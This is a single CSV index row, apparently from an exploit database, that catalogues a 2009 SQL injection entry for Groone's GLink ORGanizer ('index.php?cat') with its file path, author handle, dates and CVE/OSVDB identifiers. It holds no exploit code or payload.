 7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php,,2009-01-25,,1,OSVDB-51628;CVE-2009-0299,,,,,